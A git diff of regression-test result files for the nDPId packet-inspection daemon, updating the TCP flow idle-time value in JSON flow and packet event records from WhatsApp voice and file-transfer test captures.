@@ -77,7 +77,7 @@ 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","packets-captured":261,"packets-processed":261,"total-skipped-flows":0,"total-l4-data-len":14389,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":81,"global_ts_msec":1432820695137} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 261/261 diff --git a/test/results/whatsappfiles.pcap.out b/test/results/whatsappfiles.pcap.out index 0675ae4fb..98a891214 100644 --- a/test/results/whatsappfiles.pcap.out +++ b/test/results/whatsappfiles.pcap.out 
@@ -1,20 +1,20 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsappfiles.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1519924083411} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924083411,"flow_last_seen":1519924083411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924083411,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924083411,"flow_last_seen":1519924083411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924083411,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"} 
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"} 
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 